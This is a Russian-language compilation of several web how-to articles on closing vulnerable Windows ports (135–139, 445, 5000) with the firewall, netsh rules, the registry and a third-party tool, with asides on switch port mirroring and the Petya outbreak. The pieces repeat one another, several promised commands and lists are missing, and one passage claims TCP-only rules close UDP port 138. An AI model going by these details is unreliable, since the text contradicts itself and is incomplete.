После отключения и перезагрузки у вас из списка, получаемого командой ipconfig /all исчезнет куча лишних строк и останутся только хорошо известные вам интерфейсы.

Обратное включение выполняется простым удалением созданного ключа из реестра или заменой значения на «0» с последующей перезагрузкой.

Блокирование сетевых приложений

Каждый открытый сетевой порт представляет приложение, прослушивающее сеть. Поверхность атаки каждого сервера, подключенного к сети, можно уменьшить, отключив все необязательные сетевые службы и приложения. Версия Windows Server 2003 превосходит предшествующие версии операционной системы, так как в ней по умолчанию активизируется меньше сетевых служб. Однако аудит все же необходим, чтобы обнаружить вновь установленные приложения и изменения в конфигурации, которые открывают лишние сетевые порты.

Сканирование портов

Обязательно следует выполнить поиск открытых портов UDP и закрыть лишние. Программа сканирования показывает открытые порты компьютера, которые видны из сети. Аналогичные результаты можно получить с помощью инструментов, расположенных на хост-системе.

Хост-сканирование

Помимо использования сетевого сканера портов, открытые порты на хост-системе можно обнаружить с помощью следующей команды (запускается на хост-системе):

Аудит журнала брандмауэра

Объединение компонентов

До сих пор мы рассматривали различные методы и инструменты, с помощью которых можно обнаружить приложения, использующие сеть. Пришло время объединить их и показать, как определить открытые сетевые порты. Поразительно, как «болтливы» компьютеры в сети! Во-первых, рекомендуется познакомиться с документом Microsoft «Service overview and network port requirements for the Windows Server system» (http://support.microsoft.com/default.aspx?scid=kb;en-us;832017 ), в котором перечислены протоколы (TCP и UDP) и номера портов, используемые приложениями и большинством основных служб Windows Server. В документе описаны эти службы и используемые ими ассоциированные сетевые порты. Рекомендуется загрузить и распечатать это полезное для администраторов сетей Windows справочное руководство.

Настройка сетевого анализатора

Для этого требуется настроить монитор порта (разные поставщики называют его span port или mirrored port) в коммутаторе. Установить монитор порта в коммутаторе Cisco Catalyst компании Cisco Systems не составляет труда. Нужно зарегистрироваться на коммутаторе и активизировать режим Enable, затем перейти в режим configure terminal и ввести номер интерфейса порта коммутатора, на который следует посылать весь контролируемый трафик. Наконец, необходимо указать все отслеживаемые порты. Например, следующие команды обеспечивают мониторинг трех портов Fast Ethernet и пересылку копии трафика в порт 24.

Interface FastEthernet0/24 port monitor FastEthernet0/1 port monitor FastEthernet0/2 port monitor FastEthernet0/3 end

В данном примере сетевой анализатор, подключенный к порту 24, будет просматривать весь исходящий и входящий трафик компьютеров, подключенных к первым трем портам коммутатора. Для просмотра созданной конфигурации следует ввести команду

Первоначальный анализ

Рассмотрим пример анализа данных, проходящих через сеть. Если для сетевого анализа используется компьютер Linux, то можно получить исчерпывающее представление о типе и частоте пакетов в сети с помощью такой программы, как IPTraf в режиме Statistical. Детали трафика можно выяснить с использованием программы Tcpdump.

Вчера неизвестные устроили очередную массовую атаку с помощью вируса-шифровальщика. Эксперты заявили, что пострадали десятки крупных компаний на Украине и в России. Вирус-шифровальщик носит название Petya.A (вероятно, вирус назван в честь Петра Порошенко). Пишут, что если создать файл perfc (без расширения) и разместить его по адресу C:Windows, вирус обойдет вас стороной. Если ваш компьютер ушел в перезагрузку и начал «проверку диска», нужно его немедленно выключить. Загрузка с с LiveCD или USB-диска даст доступ к файлам. Еще один способ защиты: закрыть порты 1024–1035, 135 и 445. Как это сделать мы сейчас разберемся на примере Windows 10.

Шаг 1
Переходим в Брандмауэр Windows (лучше выбрать режим повышенной безопасности), выбираем вкладку «Дополнительные параметры ».
Выбираем вкладку «Правила для входящих подключений », потом действие «Создать правило » (в правой колонке).

tcp closed01

tcp closed02

tcp closed03

Шаг 3
Выбираем пункт «Блокировать подключение », в следующем окне отмечаем все профили: Доменный, Частный, Публичный.

tcp closed04

tcp closed05

Шаг 4
Осталось придумать название для правила (чтобы в будущем его было легко найти). Можно указать описание правила.

tcp closed06

Если какие-то программы перестанут работать или станут работать неправильно, возможно, вы перекрыли порт, которые они используют. Нужно будет добавить для них исключение в брандмауэре.

tcp closed07

135 TCP-порт используется службами удалённого обслуживания (DHCP, DNS, WINS и т.д.) и в приложениях «клиент-сервер» Microsoft (например, Exchange).

445 TCP-порт используется в Microsoft Windows 2000 и поздних версий для прямого TCP/IP-доступа без использования NetBIOS (например, в Active Directory).

За что отвечают порты 445 и 139 в ОС Windows

Данные порты используются в системе Windows для совместной работы с файлами и принтерами. Первый порт отвечает за работу протокола Server Message Blocks (SMB), а через второй работает протокол Network Basic Input-Output System (NetBIOS). Оба протокола позволяют компьютерам под управлением Windows подключаться по сети к «расшаренным» папкам и принтерам поверх основных протоколов TCP и UDP.

Начиная с Windows 2000, совместная работа с файлами и принтерами по сети осуществляется в основном через порт 445 по прикладному протоколу SMB. Протокол NetBIOS использовался в более ранних версиях системы, работая через порты 137, 138 и 139, и данная возможность сохранилась в более поздних версиях системы в качестве атавизма.

2219636

Чем опасны открытые порты

445 и 139 представляет собой незаметную, но значимую уязвимость в Windows. Оставляя данные порты незащищенными, вы широко распахиваете дверь на свой жесткий диск для непрошеных гостей вроде вирусов, троянов, червей, а также для хакерских атак. А если ваш компьютер включен в локальную сеть, то риску заражения вредоносным программным обеспечением подвергаются все ее пользователи.

Фактически, вы открываете совместный доступ к своему жесткому диску любому, кто сумеет получить доступ к данным портам. При желании и умении злоумышленники могут просмотреть содержимое жесткого диска, а то и удалить данные, форматировать сам диск или зашифровать файлы. Именно это и делали вирусы WannaCry и Petya, эпидемия которых прокатилась по миру этим летом.

Таким образом, если вы заботитесь о безопасности своих данных, будет не лишним узнать, как закрыть порты 139 и 445 в Windows.

2219637

Выясняем, открыты ли порты

2217391

Как закрыть порты в Windows 10/8/7

Существует три основных метода, позволяющих закрыть порт 445 в Windows 10, 7 или 8. Они не сильно отличаются друг от друга в зависимости от версии системы и достаточно просты. Можно попробовать любой из них на выбор. Этими же способами можно закрыть и порт 139.

2215771

Закрываем порты через брандмауэр

Первый метод, позволяющий закрыть 445 порт в Windows, является наиболее простым и доступен практически любому пользователю.

Теперь возможность входящего соединения на порт 445 будет закрыта. Если необходимо, аналогичное правило можно создать и для порта 139.

Закрываем порты через командную строку

Второй метод включает в себя операции с командной строкой и больше подходит для продвинутых пользователей Windows.

В результате выполнения процедуры так же будет создано правило брандмауэра Windows для закрытия порта 445. Некоторые пользователи, впрочем, сообщают, что данный метод не работает на их машинах: при проверке порт остается в статусе “LISTENING”. В этом случае следует попробовать третий способ, который также достаточно прост.

Закрываем порты через реестр Windows

Блокировать соединения на порт 445 можно также путем внесения изменений в системный реестр. Использовать данный метод следует с осторожностью: реестр Windows является основной базой данных всей системы, и случайно допущенная ошибка может привести к непредсказуемым последствиям. Перед работой с реестром рекомендуется сделать резервную копию, например, с помощью программы CCleaner.

Этот способ является наиболее эффективным, если точно следовать приведенной выше инструкции. Следует отметить, что он относится только к порту 445.

Для того чтобы защита была эффективнее, после внесения изменений в реестр можно также отключить службу Windows Server. Для этого выполните следующее:

Приведенные выше методы (за исключением третьего) позволяют закрыть не только порт 445, но и порты 135, 137, 138, 139. Для этого при выполнении процедуры просто заменяйте номер порта на нужный.

Важно! Необходимо помнить, что порт 445 в Windows отвечает за совместный доступ к файлам, папкам и принтерам. Таким образом, если вы закроете данный порт, вы больше не сможете «расшарить» общую папку для других пользователей или распечатать документ по сети.

Если ваш компьютер включен в локальную сеть и данные функции необходимы вам для работы, следует воспользоваться сторонними средствами защиты. К примеру, активируйте сетевой экран вашего антивируса, который возьмет под контроль все порты и будет осуществлять их мониторинг на предмет несанкционированного доступа.

2217370

Выполняя приведенные выше рекомендации, можно обезопасить себя от незаметной, но серьезной уязвимости в Windows и защитить свои данные от многочисленных видов зловредного программного обеспечения, которое способно проникнуть в систему через порты 139 и 445.

Источник

Как закрыть порты Windows

Каждый день владельцы ПК сталкиваются с огромным количеством опасных программ и вирусов, которые так или иначе попадают на жесткий диск и становятся причиной утечки важных данных, поломки компьютера, кражи важной информации и других неприятных ситуаций.

Чаще всего заражаются компьютеры, работающие на ОС Windows любых версий, будь то 7, 8, 10 или любая другая. Главная причина такой статистики – входящие подключения к ПК или «порты», которые являются слабым местом любой системы из-за своей доступности по умолчанию.

Слово «порт» – это термин, подразумевающий порядковый номер входящих подключений, которые направляются на ваш ПК от внешнего программного обеспечения. Часто бывает так, что эти порты используют вирусы, запросто проникающие на ваш компьютер при помощи IP-сети.

Вирусное программное обеспечение, попав в компьютер через такие входящие подключения, быстро заражает все важные файлы, причём не только пользовательские, но и системные. Чтобы этого избежать, мы рекомендуем закрыть все стандартные порты, которые могут стать вашим уязвимым местом при атаке хакеров.

Какие порты у Windows 7-10 самые уязвимые?

Многочисленные исследования и опросы специалистов показывают, что до 80% вредоносных атак и взломов происходили при помощи четырех основных портов, использующихся для быстрого обмена файлами между разными версиями Windows:

Закрываем порты 135-139 и 445 в Виндовс

Мы предлагаем вам ознакомиться с самыми простыми способами закрытия портов Виндовс, которые не требуют дополнительных знаний и профессиональных навыков.

Используем командную строку

Командная строка Windows – это программная оболочка, которая используется для задания определенных функций и параметров софту, не имеющему собственной графической оболочки.

Для того чтобы запустить командную строку, необходимо:

Появится рабочее окно с чёрным фоном, в котором необходимо поочередно вводить нижеприведенные команды. После каждой введенной строчки нажимайте клавишу Enter для подтверждения действия.
netsh advfirewall firewall add rule dir=in action=block protocol=tcp localport=135 name=»Block1_TCP-135″ (команда для закрытия порта 135)
netsh advfirewall firewall add rule dir=in action=block protocol=tcp localport=137 name=»Block1_TCP-137″ (команда для закрытия порта 137)
netsh advfirewall firewall add rule dir=in action=block protocol=tcp localport=138 name=»Block1_TCP-138″ (команда для закрытия порта 138)
netsh advfirewall firewall add rule dir=in action=block protocol=tcp localport=139 name=»Block_TCP-139″ (команда для закрытия порта 139)
netsh advfirewall firewall add rule dir=in action=block protocol=tcp localport=445 name=»Block_TCP-445″ (команда для закрытия порта 445)
netsh advfirewall firewall add rule dir=in action=block protocol=tcp localport=5000 name=»Block_TCP-5000″

Шесть приведенных нами команд необходимы для: закрытия 4х уязвимых TCP-портов Windows (открытых по умолчанию), закрытия UDP-порта 138, а также закрытия порта 5000, который отвечает за выведение списка доступных сервисов.

Закрываем порты сторонними программами

Если вы не хотите тратить время на работу с командной строкой, мы предлагаем вам ознакомиться со сторонними приложениями. Суть такого софта заключается в правке реестра в автоматическом режиме с графическим интерфейсом, без необходимости в ручном введении команд.

По мнению наших пользователей, самой популярной программой для этих целей является Windows Doors Cleaner. Она поможет с лёгкостью закрыть порты на компьютере с ОС Windows 7/8/8.1/10. Более старые версии операционных систем, к сожалению, не поддерживаются.

Как работать с программой, закрывающей порты

Для того чтобы воспользоваться Windows Doors Cleaner, необходимо:

1. Скачать софт и установить его
2. Запустить программу, нажав на ярлык правой кнопкой мыши и выбрав «запустить от имени администратора»
3. В появившемся рабочем окне будет список портов и кнопки «Сlose» или «Disable», которые закрывают уязвимые порты Windows, а также любые другие по желанию
4. После того, как необходимые изменения были внесены, необходимо перезагрузить систему

Ещё одним преимуществом программы является тот факт, что порты с её помощью можно не только закрывать, но и открывать.

Делаем выводы

Закрытие уязвимых сетевых портов в Виндовс – это не панацея от всех бед. Важно помнить, что сетевая безопасность может быть достигнута только комплексными действиями, нацеленными на закрытие всех уязвимостей вашего ПК.

Для безопасности Windows пользователь в обязательном порядке должен устанавливать критические обновления от Microsoft, иметь лицензированных антивирусный софт и включенный файервол, использовать исключительно безопасное программное обеспечение и регулярно читать наши статьи, в которых рассказываем обо всех существующих способах достижения анонимности и безопасности ваших данных.

Вы знаете более удобные способы закрыть сетевые порты? Поделитесь своими знаниями в комментариях и не забывайте репостить статью к себе на страничку. Делитесь полезной информацией со своими друзьями и не дайте хакерам шанса навредить вашим близким!

Источник

Как закрыть порт 135 windows 7

Порт 135 представляет собой серьёзную брешь в системе безопасности Windows.

Как закрыть порт 135 с помощью Редактора реестра

(приведён алгоритм действий для Windows 7+, для Windows Vista и Windows XP будут незначительные отличия):

– нажмите Пуск –> в текстовое поле Найти программы и файлы введите regedit;

– нажмите правой кнопкой мыши regedit.exe;

– из контекстного меню выберите Запуск от имени администратора;

– в окне Контроль учетных записей с сообщением «Разрешить следующей программе внести изменения на этом компьютере?» нажмите Да;

– введите пароль, если появится соответствующий запрос;

– в окне Редактор реестра откройте раздел [HKEY_LOCAL_MACHINESOFTWAREMicrosoftOle];

– найдите строковый (REG_SZ) параметр EnableDCOM;

– измените значение по умолчанию Y (что означает yes) на N (no);

Как закрыть или открыть порты в windows

Проблема

Проблема Брандмауэра windows (windows Firewall) заключается не в том как закрыть все порты, а в том, как открыть только необходимые. И главное, что сходу хрен поймешь, каким образом ограничить подключение к некоторым портам по IP адресам клиентов. По отдельности решить эти задачи не сложно, но чтобы было вместе — не встретил ни одного толкового руководства, поэтому и написана данная заметка. Так же, найденное решение не предполагает установки стороннего фаервола.

Недостатки Брандмауэра windows: — Если создать запрещающее правило для всех портов, а потом разрешающие для необходимых, то они не попадают в белый список, т.к. запрещающие правила приоритетнее разрешающих. Т.е. если запрет на подключение по порту существует, то разрешение на этот порт работать уже не будет.

— Нет приоритетов правил, как в нормальных фаерволах, чтобы сначала указать открытые порты, а последним задать запрещающее правило для всех остальных.

Допустим, есть VPS на винде, но у хостера нет внешнего фаервола, которым можно прикрыться. Свежеустановленная винда торчит наружу как минимум 135/tcp, 445/tcp, 49154/tcp и 3389/tcp (если включен RDP) портами даже в публичной сети (Public network), что требует исправления.

Алгоритм

Есть три типа портов, это: — Общедоступные порты, которые должны быть открыты для всего интернета. Пусть будут 80 и 443 (http и https) — Фильтруемые порты, доступные только с определенных IP адресов. Возьмем 3389 (RDP) — Все остальные, должны быть закрыты Требуется: 1. Создать правило, запрещающее всё, кроме трех вышеобозначенных портов. 2. Для общедоступных больше делать ни чего не требуется.

3. Для фильтруемого создать разрешающее правило, указав белые адреса.

Секрет в том, что при запрещении всех портов надо явно указать разрешенные. Иначе, как было сказано выше, не получится открыть нужные.

Пример

Задача 1: оставить открытыми для всего интернета 80, 443 и 3389 порты. Все остальные закрыть. 1. Создать новое правило для входящих подключений 2. Тип правила (Rule Type). Настраиваемые (Custom) 3. Программа (Program). Все программы (All programs) 4. Протокол и порты (Protocol and Ports). Тип протокола (Protocol type) — TCP. Локальный порт (Local port) — Специальные порты (Specific Ports). В поле вписать диапазон портов, за исключением 80, 443 и 3389. Должно выглядеть так — 1-79, 81-442, 444-3388, 3390-65535 5. Область (Scope). Локальный (local) — Любой IP-адрес (Any IP address). Удаленный (remote) — Любой IP-адрес (Any IP address). 6. Действие (Action). Блокировать подключение (Block the connection). 7. Профиль (Profile). Выбрать на свое усмотрение. Если не уверен, то выбрать все.

8. Имя (Name). Назвать его, например, Block_TCP.

Теперь указанные порты открыты для всего интернета, но, как минимум, не безопасно открывать всем порт RDP и желательно ограничить подключение только со своих IP адресов.

Задача 2: оставить открытыми для всего интернета 80 и 443 порты. Ограничить подключение на порт 3389 только с разрешенных IP адресов. Все остальные закрыть. Шаги 1-8 аналогичны предыдущей задаче, т.е. создается правило, разрешающее коннект по трем указанным портам. Для фильтрации по IP надо создать второе правило: 9. Создать новое правило для входящих подключений 10. Тип правила. Настраиваемые 11. Программа. Все программы 12. Протокол и порты. Тип протокола — TCP. Локальный порт — специальные порты. Вписать порт 3389 13. Область. Локальный — Любой IP-адрес. Удаленный — Указанные IP-адреса. Сюда вписать белый список IPшников или подсетей, которым разрешен коннект по данному порту 14. Действие. Разрешить подключение. 15. Профиль. Выбрать на свое усмотрение. Если не уверен, то выбрать все.

16. Имя. Назвать его, например, RDP.

Если фильтруемых портов несколько, то создается по одному правилу на каждый порт.

Ну и чтобы стать совсем защищенным — создать правило, блокирующее все UDP соединения.

Задача 2 из консоли

Для хардcoreщиков приведу вторую задачу в виде консольных команд:

netsh advfirewall firewall add rule dir=in action=block protocol=TCP localport=1-79,81-442,444-3388,3390-65535 name=»Block_TCP» netsh advfirewall firewall add rule dir=in action=allow protocol=TCP localport=3389 remoteip=192.168.0.0/24,x.x.x.x name=»RDP» netsh advfirewall firewall add rule dir=in action=block protocol= UDP name=»Block_All_UDP»

В конечном итоге, в гуёвине должно выглядеть так: Для правила RDP:

Для правила Block_TCP:

UPDATE

Выяснилось, что приведенный выше синтаксис командной строки не работает на WS2008R2, а конкретно — перечисления в любом параметре, поэтому пришлось разбивать два правила на восемь:

netsh advfirewall firewall add rule dir=in action=block protocol=TCP localport=1-79 name=»Block_TCP-1″ netsh advfirewall firewall add rule dir=in action=block protocol=TCP localport=81-442 name=»Block_TCP-2″ netsh advfirewall firewall add rule dir=in action=block protocol=TCP localport=444-3388 name=»Block_TCP-3″ netsh advfirewall firewall add rule dir=in action=block protocol=TCP localport=3390-65535 name=»Block_TCP-4″ netsh advfirewall firewall add rule dir=in action=allow protocol=TCP localport=80 name=»HTTP» netsh advfirewall firewall add rule dir=in action=allow protocol=TCP localport=443 name=»HTTPS» netsh advfirewall firewall add rule dir=in action=allow protocol=TCP localport=3389 remoteip=192.168.0.0/24 name=»RDP-1″ netsh advfirewall firewall add rule dir=in action=allow protocol=TCP localport=3389 remoteip=x.x.x.x name=»RDP-2″

Похожие записи

Как закрыть порты, блокируем протоколы

Привет всем читателям блога. Сегодня мы поговорим о портах windows и как их закрыть.Чтобы защитить компьютер, не обязательно пользоваться брандмауэром: вы можете вручную закрыть порты и блокировать некоторые протоколы.

Брандмауэр способен защитить персональный компьютер и сеть от незваных гостей. Если вы не хотите устанавливать брандмауэр, но все же хотите защитить свой компьютер, то у вас есть возможность вручную закрыть тот или иной порт или блокировать определенные протоколы.

Некоторые порты и протоколы могут быть использованы для атаки на вашу систему. Например, кто-нибудь может управлять вашим компьютером с помощью службы Telnet, если порт, через который она обычно работает (порт 23), оставлен открытым. Во многом известный троян Back Orifice, дающий отморозкам неограниченную власть над вашей системой, использует различные порты, и порты с номерами 31337 и 31338.

Чтобы защитить свой компьютер, вам стоит закрыть все порты, кроме тех, которые нужны для работы, например порт 80 должен быть открыт, если вы хотите просматривать web-страницы.

Чтобы вручную закрыть порты и блокировать протоколы, щелкните правой кнопкой мыши на папке Сетевое окружение (My Network Places) и выберите пункт Свойства (Properties) — откроется папка Сетевые подключения (Network Connections). Затем щелкните правой кнопкой мыши на соединении, для которого вы хотите закрыть порты, и снова выберите Свойства. Выделите в списке строчку Протокол Интернета (TCP/IP) (Internet protocol (TCP/IP) и щелкните на кнопке Свойства (Properties).

На вкладке Общие (General) щелкните на кнопке Дополнительно (Advanced). В появившемся диалоговом окне Дополнительные параметры TCP/IP (Advanced TCP/IP Settings) перейдите на вкладку Параметры(Options), выделите строчку Фильтрация TCP/IP (TCP/IP Filtering) и щелкните на кнопке Свойства(Properties). Появится диалоговое окно Фильтрация TCP/IP (TCP/IP filtering). Чтобы заблокировать порты TCP, UDP и протоколы IP, для каждого из них выберите пункт Только (Permit only).

Таким образом вы успешно закроете все порты TCP, UDP и заблокируете протоколы IP. Как устранить ошибки в портах читайте далее Однако закрыть все порты — это не выход. Нужно указать системе, через какие порты можно

передавать данные. Запомните, что если вы хотите просматривать web-страницы, необходимо открыть порт 80! Чтобы открыть определенные порты или разрешить использование некоторых протоколов, щелкните на кнопке Добавить (Add). Укажите порты и протоколы, которые вы хотите открыть, а затем нажмите ОК. Теперь будут использоваться только порты и протоколы из составленного вами списка.

Обратите внимание, что сетевые службы и приложения используют сотни различных портов TCP и UDP. Если вы разрешите только работу с web-сайтами (порт 80), то вы не сможете использовать другие ресурсы Интернета, такие как FTP, электронная почта (e-mail), совместный доступ к файлам, потоковый звук и видео и т. д. Поэтому данный способ подходит только тогда, когда вы хотите свести к минимуму число сетевых служб и приложений, работающих на вашем компьютере.

Получение списка имеющихся в системе портов

Существует как минимум два способа:

1. Список доступных портов можно узнать, проанализировав ключ реестра

Как отключить ненужные службы windows XP Вы можете узнать здесь

Как изменить динамический IP-адрес, для обхода времени ожидания на файла обменниках читайте далее Вот вкратце вы ознакомились, как можно закрыть порты.

Как закрыть порты?

Пройдя наш тест «безопасность вашего компьютера» вы обнаружили, что ваша система имеет один или несколько открытых портов и незнаете как их закрыть? Не беда, мы постараемся вам помочь.

Как можно закрыть порты?

Первый и самый простой вариант — это завершить работу программ или служб, которые используют эти порты (можно сказать открывают). В первую очередь это порты 135-139, 445, Это можно сделать вручную, что требует определенных знаний и навыков. Чтобы немного упростить вам эту задачу мы рекомендуем использовать небольшую программку windows Worms Doors Cleaner, объемом всего 50 kB. Скачав ее и запустив, вы увидите следующее окошко

Вам останется только нажать кнопки с надписью Disable и Close, после чего перезагрузить компьютер. В итоге все индикаторы должны быть зеленого цвета. Это будет означать, что порты 135-139, 445 и 5000 закрыты.

Эта методитка поможет закрыть вам всего несколько портов и ни в коем случае не заменит установку Firewall

Второй вариант — это установка программы Firewall и создание правил для закрытия портов. Выбрать фаерволл и узнать как его установить вы можете, почитав наши руководства в разделе «Статьи».

А теперь небольшой инструктаж по созданию правил для закрытия портов в различных фаерволах. Для закрытия определенного порта вам нужно выбрать используемый вами Firewall из списка ниже и повторить действия, указанные в руководстве, изменив всего лишь одну деталь, это номер порта.

Инструкции составлены для самых активно используемых на данный момент фаерволов. Возможно в будущем мы будем пополнять архив, если в этом будет необходимость.

Закрываем порты и блокируем протоколы

Чтобы защитить компьютер, не обязательно пользоваться брандмауэром: вы можете вручную закрыть порты и блокировать некоторые протоколы.

Брандмауэр способен защитить персональный компьютер и сеть от непрошеных гостей. Если вы не хотите устанавливать брандмауэр, но все же хотите защитить свой компьютер, то у вас есть возможность вручную закрыть тот или иной порт или блокировать определенные протоколы. Некоторые порты и протоколы могут быть использованы для атаки на вашу систему. Например, кто-нибудь может управлять вашим компьютером с помощью службы Telnet, если порт, через который она обычно работает (порт 23), оставлен открытым. Печально известный троян Back Orifice, дающий злобным хакерам неограниченную власть над вашей системой, использует различные порты, и порты с номерами 31337 и 31338. На сайте www.sans.org/resources/idfaq/oddports.php находится список портов, используемых различными троянами. Чтобы защитить свой компьютер, вам стоит закрыть все порты, кроме тех, которые нужны для работы, например порт 80 должен быть открыт, если вы хотите просматривать web-страницы. Полный список стандартных портов можно найти по адресу www.iana.org/assignments/port-numbers.

Чтобы вручную закрыть порты и блокировать протоколы, щелкните правой кнопкой мыши на папке Сетевое окружение (My Network Places) и выберите пункт Свойства (Properties) — откроется папка Сетевые подключения (Network Connections). Затем щелкните правой кнопкой мыши на соединении, для которого вы хотите закрыть порты, и снова выберите Свойства. Выделите в списке строчку Протокол Интернета (TCP/IP) (Internet protocol (TCP/IP) и щелкните на кнопке Свойства (Properties). На вкладке Общие (General) щелкните на кнопке Дополнительно (Advanced). В появившемся диалоговом окне Дополнительные параметры TCP/IP (Advanced TCP/IP Settings) перейдите на вкладку Параметры (Options), выделите строчку Фильтрация TCP/IP (TCP/IP Filtering) и щелкните на кнопке Свойства (Properties). Появится диалоговое окно Фильтрация TCP/IP (TCP/IP filtering). Чтобы заблокировать порты TCP, UDP и протоколы IP, для каждого из них выберите пункт Только (Permit only). Таким образом вы успешно закроете все порты TCP, UDP и заблокируете протоколы IP.

Однако закрыть все порты — это не выход. Нужно указать системе, через какие порты можно передавать данные. Запомните, что если вы хотите просматривать web-страницы, необходимо открыть порт 80! Чтобы открыть определенные порты или разрешить использование некоторых протоколов, щелкните на кнопке Добавить (Add). Укажите порты и протоколы, которые вы хотите открыть, а затем нажмите ОК. Теперь будут использоваться только порты и протоколы из составленного вами списка.

Обратите внимание, что сетевые службы и приложения используют сотни различных портов TCP и UDP. Если вы разрешите только работу с web-сайтами (порт 80), то вы не сможете использовать другие ресурсы Интернета, такие как FTP, электронная почта (e-mail), совместный доступ к файлам, потоковый звук и видео и т. д. Поэтому данный способ подходит только тогда, когда вы хотите свести к минимуму число сетевых служб и приложений, работающих на вашем компьютере.

В мире чуть ли не каждый день десятки компьютеров заражаются опасными вирусами, и всё больше пользователей начинают искать способы повышения безопасности своего персонального компьютера.

Наиболее часто заражаются ПК под управлением операционной системы Windows. Связано это с тем, что большинство вирусов проникают в ОС через определенные входящие подключения, так называемые «порты», которые, к сожалению, являются включёнными по умолчанию.

Несколько упрощая, понятие «порт» можно определить как номер входящего подключения внешних программ (в том числе и вирусов) к вашему компьютеру через IP-сеть. Каждому порту присваивается уникальный номер для определения единственно возможного получателя данных в операционной системе.

Проникнув в компьютер, вирусы начинают заражать данные пользователя и открывают все ранее закрытые порты Виндовс для более быстрого распространения по системе. Чтобы этого не произошло, необходимо блокировать самые уязвимые порты, тем самым предотвратив возможность заражения и подняв безопасность Windows на уровень выше.

Самые уязвимые порты Windows 7 – 10

Исследование самых крупных вирусных взломов показывает, что 80% паразитного трафика проходит через 4 порта, используемые для обмена данными между разными версиями ОС Виндовс. Наиболее уязвимыми открытыми портами Windows считаются:

TCP порт 445 (он используется для обмена файлами) TCP порт 139 (предназначен для удаленного подключения к компьютеру) UDP порт 137 (служит для поиска информации на других компьютерах) TCP порт 135 (через него выполняются задания команд)

Как закрыть порты с 135 по 139 и 445 в Windows?

Есть множество вариантов закрытия портов Виндовс, но в статье мы рассмотрим самые простые способы это сделать.

Способ 1 – использование командной строки

Командная строка Windows используется для задания значений тем настройкам системы, у которых нет графического интерфейса. К таковым функциям и относятся рассматриваемые открытые порты подключений.

Командная строка запускается в несколько этапов:

Нажмите сочетание клавиш Win+R В появившемся окне выполнения команд наберите CMD Нажмите «ОК»

Перед вами появится окно с черным фоном. По очереди скопируйте в него представленные ниже строчки и нажмите клавишу ввода:

netsh advfirewall firewall add rule dir=in action=block protocol=tcp localport=135 name=“Block1_TCP-135”

netsh advfirewall firewall add rule dir=in action=block protocol=tcp localport=137 name=“Block1_TCP-137”

netsh advfirewall firewall add rule dir=in action=block protocol=tcp localport=138 name=“Block1_TCP-138”

netsh advfirewall firewall add rule dir=in action=block protocol=tcp localport=139 name=“Block_TCP-139” (команда помогает закрыть порт 139)

netsh advfirewall firewall add rule dir=in action=block protocol=tcp localport=445 name=“Block_TCP-445” (команда помогает закрыть порт 445)

netsh advfirewall firewall add rule dir=in action=block protocol=tcp localport=5000 name=“Block_TCP-5000”

Эти шесть команд закрывают 4 перечисленных выше самых опасных открытых порта Windows, а также порт 5000, отвечающий за обнаружение открытых сервисов, и UDP порт 138 разрешения имен NetBIOS.

Способ 2 – использование сторонних программ

Чтобы не использовать ручную работу с командной строкой, можно использовать стороннее программное обеспечение. Суть его работы сводится к такой же правке реестра, как в способе выше, только в визуальном отображении.

Рекомендуем к использованию Windows Doors Cleaner, которая легко может закрыть порты на компьютере (в Windows 10 – 7: старые версии ОС данная программа не поддерживает).

Инструкция по работе с программой, закрывающей порты

Скачайте и установите программу

Установленную программу необходимо запустить с правами администратора

В появившемся окне при нажатии кнопок «Сlose» или «Disable» отключаются и закрываются все уязвимые порты Windows

Важно отметить, что с помощью этой программы можно не только закрыть, но и открыть порты.

Заключение

Помимо закрытия самых опасных сетевых портов компьютера необходимо не забывать, что этими действиями не достигается максимальная безопасность для операционной системы.

На вашей Windows необходимо устанавливать присылаемые Microsoft критические пакеты обновлений, антивирусные программы, безопасные браузеры и другое ПО, повышающее безопасность и анонимность.

Предлагаем обсудить в комментариях тему защиты сетевых портов и делиться полезными методами повышения конфиденциальности. Не забудьте отправить ссылку на эту статью вашим друзьям, чтобы они тоже знали, как закрыть открытые порты Windows.

Посмотрите также наше видео, где мы более подробно рассказываем о том, как закрыть уязвимые порты:

С последними событиями в мире, когда почти каждый месяц сотни компьютеров заражаются новыми вирусами, очередной раз стоит подумать как обезопасить свой Windows ПК.

Большинство вирусов задействуют только определенные порты в компьютерных сетях, через которые и происходит заражение компьютера, чтобы этого не произошло необходимо их закрыть, тем самым мы закрываем очередную лазейку для хакеров и поднимаем безопасность Windows на уровень выше.

Не стоит также забывать, что помимо закрытия опасных сетевых портов, необходимо позаботиться о том, что бы на вашем Windows ПК или ноутбуке устанавливались пакеты обновления, а также был установлена и постоянно обновлялась антивирусная программа.

Как закрыть порты 135-139, 445 в Windows?

Ниже мы предложим два самых простых способа закрыть сетевые порты в Windows от различных вирусов и уязвимостей.

Способ 1 — Windows Doors Cleaner

С помощью простой программы Windows Doors Cleaner, можно легко закрыть все необходимые порты. Далее мы расскажем как ей воспользоваться:

Способ 2 — командная строка (скрипт)

Если вы не хотите скачивать каких либо программ, тогда можно заблокировать все порты из командой строки:

Если не хотите писать вручную, то можете воспользоваться скриптом, запустив его от имени администратора.

Остались еще вопросы? Пишите их в комментариях, рассказывайте, что у вас получилось или наоборот!

Вот и все! Больше статей и инструкций читайте в разделе Статьи и Хаки Android. Оставайтесь вместе с сайтом Android +1, дальше будет еще интересней!

Каждый день владельцы ПК сталкиваются с огромным количеством опасных программ и вирусов, которые так или иначе попадают на жесткий диск и становятся причиной утечки важных данных, поломки компьютера, кражи важной информации и других неприятных ситуаций.

Чаще всего заражаются компьютеры, работающие на ОС Windows любых версий, будь то 7, 8, 10 или любая другая. Главная причина такой статистики – входящие подключения к ПК или «порты», которые являются слабым местом любой системы из-за своей доступности по умолчанию.

Слово «порт» – это термин, подразумевающий порядковый номер входящих подключений, которые направляются на ваш ПК от внешнего программного обеспечения. Часто бывает так, что эти порты используют вирусы, запросто проникающие на ваш компьютер при помощи IP-сети.

Вирусное программное обеспечение, попав в компьютер через такие входящие подключения, быстро заражает все важные файлы, причём не только пользовательские, но и системные. Чтобы этого избежать, мы рекомендуем закрыть все стандартные порты, которые могут стать вашим уязвимым местом при атаке хакеров.

Какие порты у Windows 7-10 самые уязвимые?

Многочисленные исследования и опросы специалистов показывают, что до 80% вредоносных атак и взломов происходили при помощи четырех основных портов, использующихся для быстрого обмена файлами между разными версиями Windows:

Закрываем порты 135-139 и 445 в Виндовс

Мы предлагаем вам ознакомиться с самыми простыми способами закрытия портов Виндовс, которые не требуют дополнительных знаний и профессиональных навыков.

Используем командную строку

Командная строка Windows – это программная оболочка, которая используется для задания определенных функций и параметров софту, не имеющему собственной графической оболочки.

